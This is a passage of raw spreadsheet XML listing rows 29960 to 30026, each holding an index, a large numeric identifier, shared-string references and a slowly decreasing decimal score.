    <row r="29960" ht="15.75" customHeight="1">
      <c r="A29960" s="1">
        <v>4630.0</v>
      </c>
      <c r="B29960" s="2">
        <v>4.2997503E7</v>
      </c>
      <c r="C29960" s="2" t="s">
        <v>28802</v>
      </c>
      <c r="D29960" s="2">
        <v>1.0</v>
      </c>
      <c r="E29960" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29960" s="2">
        <v>0.1359126984126985</v>
      </c>
    </row>
    <row r="29961" ht="15.75" customHeight="1">
      <c r="A29961" s="1">
        <v>11535.0</v>
      </c>
      <c r="B29961" s="2">
        <v>2.2566533E7</v>
      </c>
      <c r="C29961" s="2" t="s">
        <v>28803</v>
      </c>
      <c r="D29961" s="2">
        <v>1.0</v>
      </c>
      <c r="E29961" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29961" s="2">
        <v>0.1359126984126985</v>
      </c>
    </row>
    <row r="29962" ht="15.75" customHeight="1">
      <c r="A29962" s="1">
        <v>30344.0</v>
      </c>
      <c r="B29962" s="2">
        <v>3.8215277E7</v>
      </c>
      <c r="C29962" s="2" t="s">
        <v>28804</v>
      </c>
      <c r="D29962" s="2">
        <v>1.0</v>
      </c>
      <c r="E29962" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29962" s="2">
        <v>0.1359126984126984</v>
      </c>
    </row>
    <row r="29963" ht="15.75" customHeight="1">
      <c r="A29963" s="1">
        <v>11847.0</v>
      </c>
      <c r="B29963" s="2">
        <v>2.4746282E7</v>
      </c>
      <c r="C29963" s="2" t="s">
        <v>28805</v>
      </c>
      <c r="D29963" s="2">
        <v>1.0</v>
      </c>
      <c r="E29963" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29963" s="2">
        <v>0.1357012750455374</v>
      </c>
    </row>
    <row r="29964" ht="15.75" customHeight="1">
      <c r="A29964" s="1">
        <v>14345.0</v>
      </c>
      <c r="B29964" s="2">
        <v>3.8865582E7</v>
      </c>
      <c r="C29964" s="2" t="s">
        <v>28806</v>
      </c>
      <c r="D29964" s="2">
        <v>1.0</v>
      </c>
      <c r="E29964" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29964" s="2">
        <v>0.1357012750455374</v>
      </c>
    </row>
    <row r="29965" ht="15.75" customHeight="1">
      <c r="A29965" s="1">
        <v>6377.0</v>
      </c>
      <c r="B29965" s="2">
        <v>4.8412886E7</v>
      </c>
      <c r="C29965" s="2" t="s">
        <v>28807</v>
      </c>
      <c r="D29965" s="2">
        <v>1.0</v>
      </c>
      <c r="E29965" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29965" s="2">
        <v>0.1354775828460039</v>
      </c>
    </row>
    <row r="29966" ht="15.75" customHeight="1">
      <c r="A29966" s="1">
        <v>29279.0</v>
      </c>
      <c r="B29966" s="2">
        <v>3.0994721E7</v>
      </c>
      <c r="C29966" s="2" t="s">
        <v>28808</v>
      </c>
      <c r="D29966" s="2">
        <v>1.0</v>
      </c>
      <c r="E29966" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29966" s="2">
        <v>0.1354775828460039</v>
      </c>
    </row>
    <row r="29967" ht="15.75" customHeight="1">
      <c r="A29967" s="1">
        <v>18928.0</v>
      </c>
      <c r="B29967" s="2">
        <v>5.4255332E7</v>
      </c>
      <c r="C29967" s="2" t="s">
        <v>28809</v>
      </c>
      <c r="D29967" s="2">
        <v>1.0</v>
      </c>
      <c r="E29967" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29967" s="2">
        <v>0.1353046594982079</v>
      </c>
    </row>
    <row r="29968" ht="15.75" customHeight="1">
      <c r="A29968" s="1">
        <v>439.0</v>
      </c>
      <c r="B29968" s="2">
        <v>1.7021815E7</v>
      </c>
      <c r="C29968" s="2" t="s">
        <v>28810</v>
      </c>
      <c r="D29968" s="2">
        <v>1.0</v>
      </c>
      <c r="E29968" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29968" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="29969" ht="15.75" customHeight="1">
      <c r="A29969" s="1">
        <v>2314.0</v>
      </c>
      <c r="B29969" s="2">
        <v>3.286149E7</v>
      </c>
      <c r="C29969" s="2" t="s">
        <v>28811</v>
      </c>
      <c r="D29969" s="2">
        <v>1.0</v>
      </c>
      <c r="E29969" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29969" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="29970" ht="15.75" customHeight="1">
      <c r="A29970" s="1">
        <v>2591.0</v>
      </c>
      <c r="B29970" s="2">
        <v>3.4337275E7</v>
      </c>
      <c r="C29970" s="2" t="s">
        <v>28812</v>
      </c>
      <c r="D29970" s="2">
        <v>1.0</v>
      </c>
      <c r="E29970" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29970" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="29971" ht="15.75" customHeight="1">
      <c r="A29971" s="1">
        <v>5449.0</v>
      </c>
      <c r="B29971" s="2">
        <v>4.5636226E7</v>
      </c>
      <c r="C29971" s="2" t="s">
        <v>28813</v>
      </c>
      <c r="D29971" s="2">
        <v>1.0</v>
      </c>
      <c r="E29971" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29971" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="29972" ht="15.75" customHeight="1">
      <c r="A29972" s="1">
        <v>6333.0</v>
      </c>
      <c r="B29972" s="2">
        <v>4.8296312E7</v>
      </c>
      <c r="C29972" s="2" t="s">
        <v>28812</v>
      </c>
      <c r="D29972" s="2">
        <v>1.0</v>
      </c>
      <c r="E29972" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29972" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="29973" ht="15.75" customHeight="1">
      <c r="A29973" s="1">
        <v>8848.0</v>
      </c>
      <c r="B29973" s="2">
        <v>5.4723792E7</v>
      </c>
      <c r="C29973" s="2" t="s">
        <v>28812</v>
      </c>
      <c r="D29973" s="2">
        <v>1.0</v>
      </c>
      <c r="E29973" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29973" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="29974" ht="15.75" customHeight="1">
      <c r="A29974" s="1">
        <v>10285.0</v>
      </c>
      <c r="B29974" s="2">
        <v>5.7636265E7</v>
      </c>
      <c r="C29974" s="2" t="s">
        <v>28814</v>
      </c>
      <c r="D29974" s="2">
        <v>1.0</v>
      </c>
      <c r="E29974" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29974" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="29975" ht="15.75" customHeight="1">
      <c r="A29975" s="1">
        <v>17094.0</v>
      </c>
      <c r="B29975" s="2">
        <v>4.8663696E7</v>
      </c>
      <c r="C29975" s="2" t="s">
        <v>28815</v>
      </c>
      <c r="D29975" s="2">
        <v>1.0</v>
      </c>
      <c r="E29975" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29975" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="29976" ht="15.75" customHeight="1">
      <c r="A29976" s="1">
        <v>17335.0</v>
      </c>
      <c r="B29976" s="2">
        <v>4.9389611E7</v>
      </c>
      <c r="C29976" s="2" t="s">
        <v>28816</v>
      </c>
      <c r="D29976" s="2">
        <v>1.0</v>
      </c>
      <c r="E29976" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29976" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="29977" ht="15.75" customHeight="1">
      <c r="A29977" s="1">
        <v>24647.0</v>
      </c>
      <c r="B29977" s="2">
        <v>1.1484223E7</v>
      </c>
      <c r="C29977" s="2" t="s">
        <v>28817</v>
      </c>
      <c r="D29977" s="2">
        <v>1.0</v>
      </c>
      <c r="E29977" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29977" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="29978" ht="15.75" customHeight="1">
      <c r="A29978" s="1">
        <v>31907.0</v>
      </c>
      <c r="B29978" s="2">
        <v>5299056.0</v>
      </c>
      <c r="C29978" s="2" t="s">
        <v>28818</v>
      </c>
      <c r="D29978" s="2">
        <v>1.0</v>
      </c>
      <c r="E29978" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29978" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="29979" ht="15.75" customHeight="1">
      <c r="A29979" s="1">
        <v>2694.0</v>
      </c>
      <c r="B29979" s="2">
        <v>3.4830573E7</v>
      </c>
      <c r="C29979" s="2" t="s">
        <v>28819</v>
      </c>
      <c r="D29979" s="2">
        <v>1.0</v>
      </c>
      <c r="E29979" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29979" s="2">
        <v>0.1350574712643678</v>
      </c>
    </row>
    <row r="29980" ht="15.75" customHeight="1">
      <c r="A29980" s="1">
        <v>26520.0</v>
      </c>
      <c r="B29980" s="2">
        <v>1.7644698E7</v>
      </c>
      <c r="C29980" s="2" t="s">
        <v>28779</v>
      </c>
      <c r="D29980" s="2">
        <v>1.0</v>
      </c>
      <c r="E29980" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29980" s="2">
        <v>0.1350574712643678</v>
      </c>
    </row>
    <row r="29981" ht="15.75" customHeight="1">
      <c r="A29981" s="1">
        <v>25663.0</v>
      </c>
      <c r="B29981" s="2">
        <v>1.4523398E7</v>
      </c>
      <c r="C29981" s="2" t="s">
        <v>28820</v>
      </c>
      <c r="D29981" s="2">
        <v>1.0</v>
      </c>
      <c r="E29981" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29981" s="2">
        <v>0.134920634920635</v>
      </c>
    </row>
    <row r="29982" ht="15.75" customHeight="1">
      <c r="A29982" s="1">
        <v>2562.0</v>
      </c>
      <c r="B29982" s="2">
        <v>3.4239189E7</v>
      </c>
      <c r="C29982" s="2" t="s">
        <v>28821</v>
      </c>
      <c r="D29982" s="2">
        <v>1.0</v>
      </c>
      <c r="E29982" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29982" s="2">
        <v>0.1348039215686275</v>
      </c>
    </row>
    <row r="29983" ht="15.75" customHeight="1">
      <c r="A29983" s="1">
        <v>4918.0</v>
      </c>
      <c r="B29983" s="2">
        <v>4.3957469E7</v>
      </c>
      <c r="C29983" s="2" t="s">
        <v>28822</v>
      </c>
      <c r="D29983" s="2">
        <v>1.0</v>
      </c>
      <c r="E29983" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29983" s="2">
        <v>0.1348039215686275</v>
      </c>
    </row>
    <row r="29984" ht="15.75" customHeight="1">
      <c r="A29984" s="1">
        <v>15804.0</v>
      </c>
      <c r="B29984" s="2">
        <v>4.4224524E7</v>
      </c>
      <c r="C29984" s="2" t="s">
        <v>28823</v>
      </c>
      <c r="D29984" s="2">
        <v>1.0</v>
      </c>
      <c r="E29984" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29984" s="2">
        <v>0.1348039215686275</v>
      </c>
    </row>
    <row r="29985" ht="15.75" customHeight="1">
      <c r="A29985" s="1">
        <v>12863.0</v>
      </c>
      <c r="B29985" s="2">
        <v>3.1881626E7</v>
      </c>
      <c r="C29985" s="2" t="s">
        <v>28824</v>
      </c>
      <c r="D29985" s="2">
        <v>1.0</v>
      </c>
      <c r="E29985" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29985" s="2">
        <v>0.1346516007532956</v>
      </c>
    </row>
    <row r="29986" ht="15.75" customHeight="1">
      <c r="A29986" s="1">
        <v>11489.0</v>
      </c>
      <c r="B29986" s="2">
        <v>2.2036847E7</v>
      </c>
      <c r="C29986" s="2" t="s">
        <v>28825</v>
      </c>
      <c r="D29986" s="2">
        <v>1.0</v>
      </c>
      <c r="E29986" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29986" s="2">
        <v>0.1342592592592593</v>
      </c>
    </row>
    <row r="29987" ht="15.75" customHeight="1">
      <c r="A29987" s="1">
        <v>13286.0</v>
      </c>
      <c r="B29987" s="2">
        <v>3.4428418E7</v>
      </c>
      <c r="C29987" s="2" t="s">
        <v>28826</v>
      </c>
      <c r="D29987" s="2">
        <v>1.0</v>
      </c>
      <c r="E29987" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29987" s="2">
        <v>0.1342592592592593</v>
      </c>
    </row>
    <row r="29988" ht="15.75" customHeight="1">
      <c r="A29988" s="1">
        <v>16912.0</v>
      </c>
      <c r="B29988" s="2">
        <v>4.812912E7</v>
      </c>
      <c r="C29988" s="2" t="s">
        <v>28827</v>
      </c>
      <c r="D29988" s="2">
        <v>1.0</v>
      </c>
      <c r="E29988" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29988" s="2">
        <v>0.1342592592592593</v>
      </c>
    </row>
    <row r="29989" ht="15.75" customHeight="1">
      <c r="A29989" s="1">
        <v>17004.0</v>
      </c>
      <c r="B29989" s="2">
        <v>4.8418619E7</v>
      </c>
      <c r="C29989" s="2" t="s">
        <v>28828</v>
      </c>
      <c r="D29989" s="2">
        <v>1.0</v>
      </c>
      <c r="E29989" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29989" s="2">
        <v>0.1342592592592593</v>
      </c>
    </row>
    <row r="29990" ht="15.75" customHeight="1">
      <c r="A29990" s="1">
        <v>1419.0</v>
      </c>
      <c r="B29990" s="2">
        <v>2.6514618E7</v>
      </c>
      <c r="C29990" s="2" t="s">
        <v>28829</v>
      </c>
      <c r="D29990" s="2">
        <v>1.0</v>
      </c>
      <c r="E29990" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29990" s="2">
        <v>0.1342592592592592</v>
      </c>
    </row>
    <row r="29991" ht="15.75" customHeight="1">
      <c r="A29991" s="1">
        <v>2856.0</v>
      </c>
      <c r="B29991" s="2">
        <v>3.5511566E7</v>
      </c>
      <c r="C29991" s="2" t="s">
        <v>28830</v>
      </c>
      <c r="D29991" s="2">
        <v>1.0</v>
      </c>
      <c r="E29991" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29991" s="2">
        <v>0.1342592592592592</v>
      </c>
    </row>
    <row r="29992" ht="15.75" customHeight="1">
      <c r="A29992" s="1">
        <v>27224.0</v>
      </c>
      <c r="B29992" s="2">
        <v>2.098122E7</v>
      </c>
      <c r="C29992" s="2" t="s">
        <v>28831</v>
      </c>
      <c r="D29992" s="2">
        <v>1.0</v>
      </c>
      <c r="E29992" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29992" s="2">
        <v>0.1342592592592592</v>
      </c>
    </row>
    <row r="29993" ht="15.75" customHeight="1">
      <c r="A29993" s="1">
        <v>19315.0</v>
      </c>
      <c r="B29993" s="2">
        <v>5.529126E7</v>
      </c>
      <c r="C29993" s="2" t="s">
        <v>28832</v>
      </c>
      <c r="D29993" s="2">
        <v>1.0</v>
      </c>
      <c r="E29993" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29993" s="2">
        <v>0.1341269841269842</v>
      </c>
    </row>
    <row r="29994" ht="15.75" customHeight="1">
      <c r="A29994" s="1">
        <v>6417.0</v>
      </c>
      <c r="B29994" s="2">
        <v>4.8541108E7</v>
      </c>
      <c r="C29994" s="2" t="s">
        <v>28833</v>
      </c>
      <c r="D29994" s="2">
        <v>1.0</v>
      </c>
      <c r="E29994" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29994" s="2">
        <v>0.1340740740740741</v>
      </c>
    </row>
    <row r="29995" ht="15.75" customHeight="1">
      <c r="A29995" s="1">
        <v>980.0</v>
      </c>
      <c r="B29995" s="2">
        <v>2.2806803E7</v>
      </c>
      <c r="C29995" s="2" t="s">
        <v>28834</v>
      </c>
      <c r="D29995" s="2">
        <v>1.0</v>
      </c>
      <c r="E29995" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29995" s="2">
        <v>0.1339285714285715</v>
      </c>
    </row>
    <row r="29996" ht="15.75" customHeight="1">
      <c r="A29996" s="1">
        <v>13887.0</v>
      </c>
      <c r="B29996" s="2">
        <v>3.7018421E7</v>
      </c>
      <c r="C29996" s="2" t="s">
        <v>28835</v>
      </c>
      <c r="D29996" s="2">
        <v>1.0</v>
      </c>
      <c r="E29996" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29996" s="2">
        <v>0.1339285714285715</v>
      </c>
    </row>
    <row r="29997" ht="15.75" customHeight="1">
      <c r="A29997" s="1">
        <v>16086.0</v>
      </c>
      <c r="B29997" s="2">
        <v>4.5376958E7</v>
      </c>
      <c r="C29997" s="2" t="s">
        <v>28836</v>
      </c>
      <c r="D29997" s="2">
        <v>1.0</v>
      </c>
      <c r="E29997" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29997" s="2">
        <v>0.1339285714285715</v>
      </c>
    </row>
    <row r="29998" ht="15.75" customHeight="1">
      <c r="A29998" s="1">
        <v>30422.0</v>
      </c>
      <c r="B29998" s="2">
        <v>3.894059E7</v>
      </c>
      <c r="C29998" s="2" t="s">
        <v>28837</v>
      </c>
      <c r="D29998" s="2">
        <v>1.0</v>
      </c>
      <c r="E29998" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29998" s="2">
        <v>0.1339285714285715</v>
      </c>
    </row>
    <row r="29999" ht="15.75" customHeight="1">
      <c r="A29999" s="1">
        <v>6149.0</v>
      </c>
      <c r="B29999" s="2">
        <v>4.7838327E7</v>
      </c>
      <c r="C29999" s="2" t="s">
        <v>28838</v>
      </c>
      <c r="D29999" s="2">
        <v>1.0</v>
      </c>
      <c r="E29999" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29999" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="30000" ht="15.75" customHeight="1">
      <c r="A30000" s="1">
        <v>10974.0</v>
      </c>
      <c r="B30000" s="2">
        <v>1.7336646E7</v>
      </c>
      <c r="C30000" s="2" t="s">
        <v>28839</v>
      </c>
      <c r="D30000" s="2">
        <v>1.0</v>
      </c>
      <c r="E30000" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30000" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="30001" ht="15.75" customHeight="1">
      <c r="A30001" s="1">
        <v>14593.0</v>
      </c>
      <c r="B30001" s="2">
        <v>4.020878E7</v>
      </c>
      <c r="C30001" s="2" t="s">
        <v>28840</v>
      </c>
      <c r="D30001" s="2">
        <v>1.0</v>
      </c>
      <c r="E30001" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30001" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="30002" ht="15.75" customHeight="1">
      <c r="A30002" s="1">
        <v>15161.0</v>
      </c>
      <c r="B30002" s="2">
        <v>4.1999996E7</v>
      </c>
      <c r="C30002" s="2" t="s">
        <v>28841</v>
      </c>
      <c r="D30002" s="2">
        <v>1.0</v>
      </c>
      <c r="E30002" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30002" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="30003" ht="15.75" customHeight="1">
      <c r="A30003" s="1">
        <v>16952.0</v>
      </c>
      <c r="B30003" s="2">
        <v>4.8235122E7</v>
      </c>
      <c r="C30003" s="2" t="s">
        <v>28842</v>
      </c>
      <c r="D30003" s="2">
        <v>1.0</v>
      </c>
      <c r="E30003" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30003" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="30004" ht="15.75" customHeight="1">
      <c r="A30004" s="1">
        <v>17725.0</v>
      </c>
      <c r="B30004" s="2">
        <v>5.0630142E7</v>
      </c>
      <c r="C30004" s="2" t="s">
        <v>28843</v>
      </c>
      <c r="D30004" s="2">
        <v>1.0</v>
      </c>
      <c r="E30004" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30004" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="30005" ht="15.75" customHeight="1">
      <c r="A30005" s="1">
        <v>19096.0</v>
      </c>
      <c r="B30005" s="2">
        <v>5.4678235E7</v>
      </c>
      <c r="C30005" s="2" t="s">
        <v>28844</v>
      </c>
      <c r="D30005" s="2">
        <v>1.0</v>
      </c>
      <c r="E30005" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30005" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="30006" ht="15.75" customHeight="1">
      <c r="A30006" s="1">
        <v>20270.0</v>
      </c>
      <c r="B30006" s="2">
        <v>1.1093979E7</v>
      </c>
      <c r="C30006" s="2" t="s">
        <v>28845</v>
      </c>
      <c r="D30006" s="2">
        <v>1.0</v>
      </c>
      <c r="E30006" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30006" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="30007" ht="15.75" customHeight="1">
      <c r="A30007" s="1">
        <v>21503.0</v>
      </c>
      <c r="B30007" s="2">
        <v>2.3121279E7</v>
      </c>
      <c r="C30007" s="2" t="s">
        <v>28846</v>
      </c>
      <c r="D30007" s="2">
        <v>1.0</v>
      </c>
      <c r="E30007" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30007" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="30008" ht="15.75" customHeight="1">
      <c r="A30008" s="1">
        <v>23573.0</v>
      </c>
      <c r="B30008" s="2">
        <v>6216211.0</v>
      </c>
      <c r="C30008" s="2" t="s">
        <v>28847</v>
      </c>
      <c r="D30008" s="2">
        <v>1.0</v>
      </c>
      <c r="E30008" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30008" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="30009" ht="15.75" customHeight="1">
      <c r="A30009" s="1">
        <v>24610.0</v>
      </c>
      <c r="B30009" s="2">
        <v>1.1435929E7</v>
      </c>
      <c r="C30009" s="2" t="s">
        <v>28848</v>
      </c>
      <c r="D30009" s="2">
        <v>1.0</v>
      </c>
      <c r="E30009" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30009" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="30010" ht="15.75" customHeight="1">
      <c r="A30010" s="1">
        <v>27778.0</v>
      </c>
      <c r="B30010" s="2">
        <v>2.3121278E7</v>
      </c>
      <c r="C30010" s="2" t="s">
        <v>28849</v>
      </c>
      <c r="D30010" s="2">
        <v>1.0</v>
      </c>
      <c r="E30010" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30010" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="30011" ht="15.75" customHeight="1">
      <c r="A30011" s="1">
        <v>28033.0</v>
      </c>
      <c r="B30011" s="2">
        <v>2.4455083E7</v>
      </c>
      <c r="C30011" s="2" t="s">
        <v>28850</v>
      </c>
      <c r="D30011" s="2">
        <v>1.0</v>
      </c>
      <c r="E30011" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30011" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="30012" ht="15.75" customHeight="1">
      <c r="A30012" s="1">
        <v>29351.0</v>
      </c>
      <c r="B30012" s="2">
        <v>3.152027E7</v>
      </c>
      <c r="C30012" s="2" t="s">
        <v>28851</v>
      </c>
      <c r="D30012" s="2">
        <v>1.0</v>
      </c>
      <c r="E30012" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30012" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="30013" ht="15.75" customHeight="1">
      <c r="A30013" s="1">
        <v>31870.0</v>
      </c>
      <c r="B30013" s="2">
        <v>5285794.0</v>
      </c>
      <c r="C30013" s="2" t="s">
        <v>28852</v>
      </c>
      <c r="D30013" s="2">
        <v>1.0</v>
      </c>
      <c r="E30013" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30013" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="30014" ht="15.75" customHeight="1">
      <c r="A30014" s="1">
        <v>897.0</v>
      </c>
      <c r="B30014" s="2">
        <v>2.2099155E7</v>
      </c>
      <c r="C30014" s="2" t="s">
        <v>28853</v>
      </c>
      <c r="D30014" s="2">
        <v>1.0</v>
      </c>
      <c r="E30014" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30014" s="2">
        <v>0.1335282651072125</v>
      </c>
    </row>
    <row r="30015" ht="15.75" customHeight="1">
      <c r="A30015" s="1">
        <v>5580.0</v>
      </c>
      <c r="B30015" s="2">
        <v>4.6054386E7</v>
      </c>
      <c r="C30015" s="2" t="s">
        <v>28854</v>
      </c>
      <c r="D30015" s="2">
        <v>1.0</v>
      </c>
      <c r="E30015" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30015" s="2">
        <v>0.1335282651072125</v>
      </c>
    </row>
    <row r="30016" ht="15.75" customHeight="1">
      <c r="A30016" s="1">
        <v>16693.0</v>
      </c>
      <c r="B30016" s="2">
        <v>4.7353236E7</v>
      </c>
      <c r="C30016" s="2" t="s">
        <v>28855</v>
      </c>
      <c r="D30016" s="2">
        <v>1.0</v>
      </c>
      <c r="E30016" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30016" s="2">
        <v>0.1335282651072125</v>
      </c>
    </row>
    <row r="30017" ht="15.75" customHeight="1">
      <c r="A30017" s="1">
        <v>10989.0</v>
      </c>
      <c r="B30017" s="2">
        <v>1.7419582E7</v>
      </c>
      <c r="C30017" s="2" t="s">
        <v>28856</v>
      </c>
      <c r="D30017" s="2">
        <v>1.0</v>
      </c>
      <c r="E30017" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30017" s="2">
        <v>0.1335125448028674</v>
      </c>
    </row>
    <row r="30018" ht="15.75" customHeight="1">
      <c r="A30018" s="1">
        <v>28771.0</v>
      </c>
      <c r="B30018" s="2">
        <v>2.8418212E7</v>
      </c>
      <c r="C30018" s="2" t="s">
        <v>28857</v>
      </c>
      <c r="D30018" s="2">
        <v>1.0</v>
      </c>
      <c r="E30018" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30018" s="2">
        <v>0.1335125448028674</v>
      </c>
    </row>
    <row r="30019" ht="15.75" customHeight="1">
      <c r="A30019" s="1">
        <v>26829.0</v>
      </c>
      <c r="B30019" s="2">
        <v>1.887027E7</v>
      </c>
      <c r="C30019" s="2" t="s">
        <v>28858</v>
      </c>
      <c r="D30019" s="2">
        <v>1.0</v>
      </c>
      <c r="E30019" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30019" s="2">
        <v>0.1334876543209877</v>
      </c>
    </row>
    <row r="30020" ht="15.75" customHeight="1">
      <c r="A30020" s="1">
        <v>26803.0</v>
      </c>
      <c r="B30020" s="2">
        <v>1.86673E7</v>
      </c>
      <c r="C30020" s="2" t="s">
        <v>28859</v>
      </c>
      <c r="D30020" s="2">
        <v>1.0</v>
      </c>
      <c r="E30020" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30020" s="2">
        <v>0.133169934640523</v>
      </c>
    </row>
    <row r="30021" ht="15.75" customHeight="1">
      <c r="A30021" s="1">
        <v>5887.0</v>
      </c>
      <c r="B30021" s="2">
        <v>4.7087969E7</v>
      </c>
      <c r="C30021" s="2" t="s">
        <v>28860</v>
      </c>
      <c r="D30021" s="2">
        <v>1.0</v>
      </c>
      <c r="E30021" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30021" s="2">
        <v>0.1331699346405229</v>
      </c>
    </row>
    <row r="30022" ht="15.75" customHeight="1">
      <c r="A30022" s="1">
        <v>30125.0</v>
      </c>
      <c r="B30022" s="2">
        <v>3.6901167E7</v>
      </c>
      <c r="C30022" s="2" t="s">
        <v>28861</v>
      </c>
      <c r="D30022" s="2">
        <v>1.0</v>
      </c>
      <c r="E30022" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30022" s="2">
        <v>0.1331569664902999</v>
      </c>
    </row>
    <row r="30023" ht="15.75" customHeight="1">
      <c r="A30023" s="1">
        <v>2332.0</v>
      </c>
      <c r="B30023" s="2">
        <v>3.2953627E7</v>
      </c>
      <c r="C30023" s="2" t="s">
        <v>28862</v>
      </c>
      <c r="D30023" s="2">
        <v>1.0</v>
      </c>
      <c r="E30023" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30023" s="2">
        <v>0.1331417624521073</v>
      </c>
    </row>
    <row r="30024" ht="15.75" customHeight="1">
      <c r="A30024" s="1">
        <v>5412.0</v>
      </c>
      <c r="B30024" s="2">
        <v>4.5524814E7</v>
      </c>
      <c r="C30024" s="2" t="s">
        <v>28863</v>
      </c>
      <c r="D30024" s="2">
        <v>1.0</v>
      </c>
      <c r="E30024" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30024" s="2">
        <v>0.1331417624521073</v>
      </c>
    </row>
    <row r="30025" ht="15.75" customHeight="1">
      <c r="A30025" s="1">
        <v>18601.0</v>
      </c>
      <c r="B30025" s="2">
        <v>5.3281503E7</v>
      </c>
      <c r="C30025" s="2" t="s">
        <v>28864</v>
      </c>
      <c r="D30025" s="2">
        <v>1.0</v>
      </c>
      <c r="E30025" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30025" s="2">
        <v>0.1331417624521073</v>
      </c>
    </row>
    <row r="30026" ht="15.75" customHeight="1">
      <c r="A30026" s="1">
        <v>5551.0</v>
      </c>
      <c r="B30026" s="2">
        <v>4.5943505E7</v>
      </c>
      <c r="C30026" s="2" t="s">
        <v>28865</v>
      </c>
      <c r="D30026" s="2">
        <v>1.0</v>
      </c>
      <c r="E30026" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30026" s="2">
        <v>0.1331236897274633</v>
      </c>
    </row>
